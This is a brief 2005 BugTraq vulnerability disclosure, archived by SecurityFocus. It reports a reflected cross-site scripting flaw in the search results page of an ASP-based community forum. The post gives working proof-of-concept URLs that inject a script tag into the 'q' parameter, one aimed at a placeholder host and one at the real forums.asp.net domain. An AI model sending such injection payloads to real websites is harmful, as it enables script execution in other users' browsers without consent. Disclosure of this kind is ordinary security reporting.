BugTraq
XSS IN Community forum Jun 27 2005 11:30PM
abducter_minds yahoo com
there is aproplem in Community forum
community forum make by asp
i found a xss in search
when we typed
http://www.victim.com/forum/search/SearchResults.aspx?q=><script>alert('
CSS%20Vulnerable')</script><b%20a=a%20&f=&u=
EXAMPLE
http://forums.asp.net/search/SearchResults.aspx?q=><script>alert('CSS%20
Vulnerable')</script><b%20a=a%20&f=&u=

it will make a xss

credit

abducter_minds (at) yahoo (dot) com [email concealed]
all ARAB { EGYPT }

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus